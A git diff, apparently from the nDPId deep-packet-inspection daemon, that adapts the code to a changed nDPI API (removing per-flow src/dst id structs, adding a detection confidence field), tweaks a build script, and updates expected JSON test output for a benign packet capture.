                 {
                     logger(1, "JSON parsing failed: %s", nDPIsrvd_enum_to_string(parse_ret));
+                    logger(1, "Problematic JSON string (start: %zu, length: %llu, buffer usage: %zu): %.*s",
+                           mock_sock->buffer.json_string_start,
+                           mock_sock->buffer.json_string_length,
+                           mock_sock->buffer.used,
+                           (int)mock_sock->buffer.json_string_length,
+                           mock_sock->buffer.json_string);
                     THREAD_ERROR_GOTO(trv);
                 }
 
diff --git a/nDPId.c b/nDPId.c
index 53929aed4..682f0bae0 100644
--- a/nDPId.c
+++ b/nDPId.c
@@ -122,6 +122,7 @@ struct nDPId_flow_extended
     uint64_t last_flow_update;
 
     unsigned long long int total_l4_payload_len;
+    struct ndpi_proto detected_l7_protocol;
 };
 
 /*
@@ -139,11 +140,8 @@ struct nDPId_flow_skipped
 struct nDPId_detection_data
 {
     uint32_t last_ndpi_flow_struct_hash;
-    struct ndpi_proto detected_l7_protocol;
     struct ndpi_proto guessed_l7_protocol;
     struct ndpi_flow_struct flow;
-    struct ndpi_id_struct src;
-    struct ndpi_id_struct dst;
 };
 
 struct nDPId_flow_info
@@ -151,8 +149,7 @@ struct nDPId_flow_info
     struct nDPId_flow_extended flow_extended;
 
     uint8_t detection_completed : 1;
-    uint8_t extra_dissection_completed : 1;
-    uint8_t reserved_00 : 6;
+    uint8_t reserved_00 : 7;
     uint8_t reserved_01[1];
 #ifdef ENABLE_ZLIB
     uint16_t detection_data_compressed_size;
@@ -167,8 +164,8 @@ struct nDPId_flow_finished
 {
     struct nDPId_flow_extended flow_extended;
 
-    struct ndpi_proto detected_l7_protocol;
     ndpi_risk risk;
+    ndpi_confidence_t confidence;
 };
 
 /* TODO: Merge `struct nDPId_flow_info' with `struct nDPId_flow_finished' and use a union instead? */
@@ -621,15 +618,6 @@ static int detection_data_inflate(struct nDPId_flow_info * const flow_info)
     memcpy(flow_info->detection_data, tmpOut, ret);
     flow_info->detection_data_compressed_size = 0;
 
-    /*
-     * The ndpi_id_struct's from ndpi_flow may not be valid anymore.
-     * nDPI only updates those pointers while processing packets!
-     * This is especially important when using compression
-     * to prevent use of dangling pointers.
-     */
-    flow_info->detection_data->flow.src = &flow_info->detection_data->src;
-    flow_info->detection_data->flow.dst = &flow_info->detection_data->dst;
-
     return ret;
 }
 
@@ -2381,7 +2369,8 @@ static void jsonize_flow_event(struct nDPId_reader_thread * const reader_thread,
                 ndpi_serialize_proto(workflow->ndpi_struct,
                                      &workflow->ndpi_serializer,
                                      flow_finished->risk,
-                                     flow_finished->detected_l7_protocol);
+                                     flow_finished->confidence,
+                                     flow_finished->flow_extended.detected_l7_protocol);
             }
             break;
 
@@ -2453,7 +2442,7 @@ static void jsonize_flow_detection_event(struct nDPId_reader_thread * const read
         case FLOW_EVENT_DETECTION_UPDATE:
             if (ndpi_dpi2json(workflow->ndpi_struct,
                               &flow_info->detection_data->flow,
-                              flow_info->detection_data->detected_l7_protocol,
+                              flow_info->flow_extended.detected_l7_protocol,
                               &workflow->ndpi_serializer) != 0)
             {
                 logger(1,
@@ -2704,13 +2693,14 @@ static uint32_t calculate_ndpi_flow_struct_hash(struct ndpi_flow_struct const *
     uint32_t hash = murmur3_32((uint8_t const *)&ndpi_flow->protos, sizeof(ndpi_flow->protos), nDPId_FLOW_STRUCT_SEED);
     hash += ndpi_flow->category;
     hash += ndpi_flow->risk;
+    hash += ndpi_flow->confidence;
 
-    const size_t protocol_bitmask_size = sizeof(ndpi_flow->src->detected_protocol_bitmask.fds_bits) /
-                                         sizeof(ndpi_flow->src->detected_protocol_bitmask.fds_bits[0]);
+    const size_t protocol_bitmask_size = sizeof(ndpi_flow->excluded_protocol_bitmask.fds_bits) /
+                                         sizeof(ndpi_flow->excluded_protocol_bitmask.fds_bits[0]);
     for (size_t i = 0; i < protocol_bitmask_size; ++i)
     {
-        hash += ndpi_flow->src->detected_protocol_bitmask.fds_bits[i];
-        hash += ndpi_flow->dst->detected_protocol_bitmask.fds_bits[i];
+        hash += ndpi_flow->excluded_protocol_bitmask.fds_bits[i];
+        hash += ndpi_flow->excluded_protocol_bitmask.fds_bits[i];
     }
 
     size_t host_server_name_len =
@@ -3106,10 +3096,7 @@ static void ndpi_process_packet(uint8_t * const args,
     void * tree_result;
     struct nDPId_flow_info * flow_to_process;
 
-    uint8_t direction_changed = 0;
     uint8_t is_new_flow = 0;
-    struct ndpi_id_struct * ndpi_src;
-    struct ndpi_id_struct * ndpi_dst;
 
     const struct ndpi_iphdr * ip;
     struct ndpi_ipv6hdr * ip6;
@@ -3376,10 +3363,6 @@ static void ndpi_process_packet(uint8_t * const args,
         flow_basic.dst_port = orig_src_port;
 
         tree_result = ndpi_tfind(&flow_basic, &workflow->ndpi_flows_active[hashed_index], ndpi_workflow_node_cmp);
-        if (tree_result != NULL)
-        {
-            direction_changed = 1;
-        }
 
         flow_basic.src.v6.ip[0] = orig_src_ip[0];
         flow_basic.src.v6.ip[1] = orig_src_ip[1];
@@ -3496,9 +3479,6 @@ static void ndpi_process_packet(uint8_t * const args,
             return;
         }
 
-        ndpi_src = &flow_to_process->detection_data->src;
-        ndpi_dst = &flow_to_process->detection_data->dst;
-
         is_new_flow = 1;
     }
     else
@@ -3528,9 +3508,6 @@ static void ndpi_process_packet(uint8_t * const args,
         }
         flow_to_process = (struct nDPId_flow_info *)flow_basic_to_process;
 
-        ndpi_src = NULL;
-        ndpi_dst = NULL;
-
         if (flow_to_process->flow_extended.flow_basic.state == FS_INFO)
         {
 #ifdef ENABLE_ZLIB
@@ -3547,20 +3524,6 @@ static void ndpi_process_packet(uint8_t * const args,
                 }
             }
 #endif
-
-            if (flow_to_process->detection_data != NULL)
-            {
-                if (direction_changed != 0)
-                {
-                    ndpi_src = &flow_to_process->detection_data->dst;
-                    ndpi_dst = &flow_to_process->detection_data->src;
-                }
-                else
-                {
-                    ndpi_src = &flow_to_process->detection_data->src;
-                    ndpi_dst = &flow_to_process->detection_data->dst;
-                }
-            }
         }
     }
 
@@ -3632,16 +3595,14 @@ static void ndpi_process_packet(uint8_t * const args,
         }
     }
 
-    flow_to_process->detection_data->detected_l7_protocol =
+    flow_to_process->flow_extended.detected_l7_protocol =
         ndpi_detection_process_packet(workflow->ndpi_struct,
                                       &flow_to_process->detection_data->flow,
                                       ip != NULL ? (uint8_t *)ip : (uint8_t *)ip6,
                                       ip_size,
-                                      workflow->last_time,
-                                      ndpi_src,
-                                      ndpi_dst);
+                                      workflow->last_time);
 
-    if (ndpi_is_protocol_detected(workflow->ndpi_struct, flow_to_process->detection_data->detected_l7_protocol) != 0 &&
+    if (ndpi_is_protocol_detected(workflow->ndpi_struct, flow_to_process->flow_extended.detected_l7_protocol) != 0 &&
         flow_to_process->detection_completed == 0)
     {
         flow_to_process->detection_completed = 1;
@@ -3649,13 +3610,8 @@ static void ndpi_process_packet(uint8_t * const args,
         jsonize_flow_detection_event(reader_thread, flow_to_process, FLOW_EVENT_DETECTED);
         flow_to_process->detection_data->last_ndpi_flow_struct_hash =
             calculate_ndpi_flow_struct_hash(&flow_to_process->detection_data->flow);
-
-        if (ndpi_extra_dissection_possible(workflow->ndpi_struct, &flow_to_process->detection_data->flow) == 0)
-        {
-            flow_to_process->extra_dissection_completed = 1;
-        }
     }
-    else if (flow_to_process->detection_completed == 1 && flow_to_process->extra_dissection_completed == 0)
+    else if (flow_to_process->detection_completed == 1)
     {
         uint32_t hash = calculate_ndpi_flow_struct_hash(&flow_to_process->detection_data->flow);
         if (hash != flow_to_process->detection_data->last_ndpi_flow_struct_hash)
@@ -3664,34 +3620,28 @@ static void ndpi_process_packet(uint8_t * const args,
             jsonize_flow_detection_event(reader_thread, flow_to_process, FLOW_EVENT_DETECTION_UPDATE);
             flow_to_process->detection_data->last_ndpi_flow_struct_hash = hash;
         }
-
-        if (ndpi_extra_dissection_possible(workflow->ndpi_struct, &flow_to_process->detection_data->flow) == 0)
-        {
-            flow_to_process->extra_dissection_completed = 1;
-        }
     }
 
     if (flow_to_process->detection_data->flow.num_processed_pkts == nDPId_options.max_packets_per_flow_to_process ||
-        (flow_to_process->detection_completed == 1 && flow_to_process->extra_dissection_completed == 1))
+        (flow_to_process->detection_completed == 1 &&
+         ndpi_extra_dissection_possible(workflow->ndpi_struct, &flow_to_process->detection_data->flow) == 0))
     {
-        struct ndpi_proto detected_l7_protocol = flow_to_process->detection_data->detected_l7_protocol;
+        struct ndpi_proto detected_l7_protocol = flow_to_process->flow_extended.detected_l7_protocol;
+        if (ndpi_is_protocol_detected(workflow->ndpi_struct, detected_l7_protocol) == 0)
+        {
+            detected_l7_protocol = flow_to_process->detection_data->guessed_l7_protocol;
+        }
+
         ndpi_risk risk = flow_to_process->detection_data->flow.risk;
+        ndpi_confidence_t confidence = flow_to_process->detection_data->flow.confidence;
 
         free_detection_data(flow_to_process);
 
         flow_to_process->flow_extended.flow_basic.state = FS_FINISHED;
         struct nDPId_flow_finished * const flow_finished = (struct nDPId_flow_finished *)flow_to_process;
-        if (flow_to_process->detection_completed == 0)
-        {
-            struct ndpi_proto unknown_l7_protocol = {};
-            flow_finished->detected_l7_protocol = unknown_l7_protocol;
-            flow_finished->risk = NDPI_NO_RISK;
-        }
-        else
-        {
-            flow_finished->detected_l7_protocol = detected_l7_protocol;
-            flow_finished->risk = risk;
-        }
+        flow_finished->flow_extended.detected_l7_protocol = detected_l7_protocol;
+        flow_finished->risk = risk;
+        flow_finished->confidence = confidence;
     }
 
 #ifdef ENABLE_ZLIB
@@ -3854,7 +3804,8 @@ static int start_reader_threads(void)
 
     errno = 0;
     if (nDPId_options.user != NULL &&
-        change_user_group(nDPId_options.user, nDPId_options.group, nDPId_options.pidfile, NULL, NULL) != 0)
+        change_user_group(nDPId_options.user, nDPId_options.group, nDPId_options.pidfile, NULL, NULL) != 0 &&
+        errno != EPERM)
     {
         if (errno != 0)
         {
diff --git a/scripts/get-and-build-libndpi.sh b/scripts/get-and-build-libndpi.sh
index 215c7b9b0..f4bae262e 100755
--- a/scripts/get-and-build-libndpi.sh
+++ b/scripts/get-and-build-libndpi.sh
@@ -10,6 +10,17 @@ flock -x -n 42 || {
     exit 1;
 }
 
+cat <<EOF
+------ environment variables ------
+CFLAGS=${CFLAGS:-}
+LDFLAGS=${LDFLAGS:-}
+CROSS_COMPILE_TRIPLET=${CROSS_COMPILE_TRIPLET:-}
+ADDITIONAL_ARGS=${ADDITIONAL_ARGS:-}
+MAKE_PROGRAM=${MAKE_PROGRAM:-}
+DEST_INSTALL=${DEST_INSTALL:-}
+-----------------------------------
+EOF
+
 set -x
 
 cd "$(dirname "${0}")/.."
diff --git a/test/results/1kxun.pcap.out b/test/results/1kxun.pcap.out
index ce2a5759a..48020bad1 100644
--- a/test/results/1kxun.pcap.out
+++ b/test/results/1kxun.pcap.out
@@ -1,83 +1,83 @@
 00437{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"1kxun.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373025,"flow_last_seen":1470104373025,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104373025,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1470104373025,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104373025,"pkt":"AQBeAAD8SNIkYzEACABFAAA2OooAAAER2FzAqAUs4AAA\/OizFOsAIin75qEAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="}
-00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373025,"flow_last_seen":1470104373025,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104373025,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373025,"flow_last_seen":1470104373025,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104373025,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1470104373127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104373127,"pkt":"AQBeAAD8SNIkYzEACABFAAA2OosAAAER2FvAqAUs4AAA\/OizFOsAIin75qEAAAABAAAAAAAACGphc29uLVBDAAD\/AAE="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1470104373232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104373232,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMBcAAAER01nAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":55809,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1470104373232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104373232,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOowAAAERyPHAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373232,"flow_last_seen":1470104373232,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104373232,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"239.255.255.250","src_port":51389,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00840{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1470104373741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1470104373741,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNKS5AgEGAMCRIFIAAIAAwKgFJMCoBSTAqHcBAAAAAAAmWsJjVQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQEKgioX8MMe8wtdP8AAAAA"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104375419,"flow_last_seen":1470104375419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1470104375419,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1470104375419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1470104375419,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ZDJAAEAGzmrAqAUQROn9hdFlAFAG4xw3xV6fSoAREAEocwAAAQEIChoPAavPGvHS"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1470104376017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104376017,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRIAAAQRv2HAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1470104376017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1470104376017,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfhwAAAERhWTAqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
